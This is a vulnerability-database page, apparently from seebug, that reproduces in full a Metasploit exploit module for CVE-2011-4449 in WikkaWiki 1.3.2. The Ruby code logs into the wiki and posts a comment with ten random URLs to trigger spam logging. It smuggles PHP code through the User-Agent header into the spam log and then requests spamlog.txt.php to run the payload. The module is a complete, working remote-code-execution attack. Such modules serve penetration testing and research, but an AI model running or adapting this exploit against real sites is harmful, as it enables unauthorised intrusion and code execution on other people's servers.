Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:72878
HistoryJul 01, 2014 - 12:00 a.m.

WikkaWiki 1.3.2 Spam Logging PHP Injection

2014-07-0100:00:00
Root
www.seebug.org
8877

EPSS

0.053

Percentile

93.2%

JSON

No description provided by source.


                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info={})
        super(update_info(info,
            'Name'           => "WikkaWiki 1.3.2 Spam Logging PHP Injection",
            'Description'    => %q{
                    This module exploits a vulnerability found in WikkaWiki.  When the spam logging
                feature is enabled, it is possible to inject PHP code into the spam log file via the
                UserAgent header , and then request it to execute our payload.  There are at least
                three different ways to trigger spam protection, this module does so by generating
                10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).

                    Please note that in order to use the injection, you must manually pick a page
                first that allows you to add a comment, and then set it as 'PAGE'.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'EgiX',   #Initial discovery, PoC
                    'sinn3r'  #Metasploit
                ],
            'References'     =>
                [
                    ['CVE', '2011-4449'],
                    ['OSVDB', '77391'],
                    ['EDB', '18177'],
                    ['URL', 'http://wush.net/trac/wikka/ticket/1098']
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00"
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction' => "none"
                },
            'Arch'           => ARCH_PHP,
            'Platform'       => ['php'],
            'Targets'        =>
                [
                    ['WikkaWiki 1.3.2 r1814', {}]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Nov 30 2011",
            'DefaultTarget'  => 0))

        register_options(
            [
                OptString.new('USERNAME',  [true, 'WikkaWiki username']),
                OptString.new('PASSWORD',  [true, 'WikkaWiki password']),
                OptString.new('PAGE',      [true, 'Page to inject']),
                OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
            ], self.class)
    end


    def check
        res = send_request_raw({
            'method' => 'GET',
            'uri'    => "#{target_uri.path}wikka.php?wakka=HomePage"
        })

        if res and res.body =~ /Powered by WikkaWiki/
            return Exploit::CheckCode::Detected
        else
            return Exploit::CheckCode::Safe
        end
    end


    #
    # Get the cookie before we do any of that login/exploity stuff
    #
    def get_cookie
        res = send_request_raw({
            'method' => 'GET',
            'uri'    => "#{@base}wikka.php"
        })

        # Get the cookie in this format:
        # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
        if res and res.headers['Set-Cookie']
            cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
        else
            raise RuntimeError, "#{@peer} - No cookie found, will not continue"
        end

        cookie
    end


    #
    # Do login, and then return the cookie that contains our credential
    #
    def login(cookie)
        # Send a request to the login page so we can obtain some hidden values needed for login
        uri = "#{@base}wikka.php?wakka=UserSettings"
        res = send_request_raw({
            'method'  => 'GET',
            'uri'     => uri,
            'cookie'  => cookie
        })

        # Extract the hidden fields
        login = {}
        if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>Login\/Register\<\/legend\>/m
            fields = $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
            fields.each do |name, value|
                login[name] = value
            end
        else
            raise RuntimeError, "#{@peer} - Unable to find the hidden fieldset required for login"
        end

        # Add the rest of fields required for login
        login['action']       = 'login'
        login['name']         = datastore['USERNAME']
        login['password']     = datastore['PASSWORD']
        login['do_redirect']  = 'on'
        login['submit']       = "Login"
        login['confpassword'] = ''
        login['email']        = ''

        port = (rport.to_i == 80) ? "" : ":#{rport}"
        res = send_request_cgi({
            'method'    => 'POST',
            'uri'       => uri,
            'cookie'    => cookie,
            'headers'   => { 'Referer' => "http://#{rhost}#{port}#{uri}" },
            'vars_post' => login
        })

        if res and res.headers['Set-Cookie'] =~ /user_name/
            user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
            pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
            cookie_cred = "#{cookie}; #{user}; #{pass}"
        else
            cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
            raise RuntimeError, "#{@peer} - Unable to login with \"#{cred}\""
        end

        return cookie_cred
    end


    #
    # After login, we inject the PHP payload
    #
    def inject_exec(cookie)
        # Get the necessary fields in order to post a comment
        res = send_request_raw({
            'method' => 'GET',
            'uri'    => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
            'cookie' => cookie
        })

        fields = {}
        if res and res.body =~ /\<form action\=.+processcomment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
            $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
                fields[n] = v
            end
        else
            raise RuntimeError, "#{@peer} - Cannot get necessary fields before posting a comment"
        end

        # Generate enough URLs to trigger spam logging
        urls = ''
        10.times do |i|
            urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'org', 'us', 'info'].sample}\n"
        end

        # Add more fields
        fields['body']   = urls
        fields['submit'] = 'Add'

        # Inject payload
        b64_payload = Rex::Text.encode_base64(payload.encoded)
        port = (rport.to_i == 80) ? "" : ":#{rport}"
        uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
        post_data = ""
        send_request_cgi({
            'method'    => 'POST',
            'uri'       => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
            'cookie'    => cookie,
            'headers'   => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
            'vars_post' => fields,
            'agent'     => "<?php #{payload.encoded} ?>"
        })

        send_request_raw({
            'method' => 'GET',
            'uri'    => "#{@base}spamlog.txt.php"
        })
    end


    def exploit
        @peer = "#{rhost}:#{rport}"

        @base = target_uri.path
        @base << '/' if @base[-1, 1] != '/'

        print_status("#{@peer} - Getting cookie")
        cookie = get_cookie

        print_status("#{@peer} - Logging in")
        cred = login(cookie)

        print_status("#{@peer} - Triggering spam logging")
        inject_exec(cred)

        handler
    end
end


=begin
For testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka

Open wikka.config.php, do:
'spam_logging' => '1'
=end

Related

checkpoint_advisories 1
cve 1
packetstorm 2
zdt 2
prion 1
cvelist 1
nvd 1
exploitdb 2
openvas 2
seebug 2
securityvulns 1
exploitpack 1
checkpoint_advisories
checkpoint_advisories
WikkaWiki Spam Logging PHP Injection (CVE-2011-4449)
2013-11-04 00:00:00
cve
cve
CVE-2011-4449
2012-09-05 20:55:01
packetstorm
packetstorm
WikkaWiki 1.3.2 Spam Logging PHP Injection
2012-05-11 00:00:00
WikkaWiki 1.3.2 Code Execution / Shell Upload / SQL Injection
2011-11-30 00:00:00
zdt
zdt
WikkaWiki 1.3.2 Spam Logging PHP Injection
2012-05-12 00:00:00
WikkaWiki <= 1.3.2 Multiple Security Vulnerabilities
2011-11-30 00:00:00
prion
prion
Code injection
2012-09-05 20:55:00
cvelist
cvelist
CVE-2011-4449
2012-09-05 20:00:00
nvd
nvd
CVE-2011-4449
2012-09-05 20:55:01
exploitdb
exploitdb
WikkaWiki 1.3.2 - Spam Logging PHP Injection (Metasploit)
2012-05-12 00:00:00
WikkaWiki 1.3.2 - Multiple Vulnerabilities
2011-11-30 00:00:00
openvas
openvas
WikkaWiki Multiple Security Vulnerabilities
2011-12-01 00:00:00
WikkaWiki Multiple Security Vulnerabilities
2011-12-01 00:00:00
seebug
seebug
WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities
2014-07-01 00:00:00
WikkaWiki &lt;= 1.3.2 Multiple Security Vulnerabilities
2011-12-01 00:00:00
securityvulns
securityvulns
WikkaWiki &lt;= 1.3.2 Multiple Security Vulnerabilities
2011-12-04 00:00:00
exploitpack
exploitpack
WikkaWiki 1.3.2 - Multiple Vulnerabilities
2011-11-30 00:00:00

EPSS

0.053

Percentile

93.2%

JSON
Related for SSV:72878
checkpoint_advisories1cve1packetstorm2zdt2prion1cvelist1nvd1exploitdb2openvas2seebug2securityvulns1exploitpack1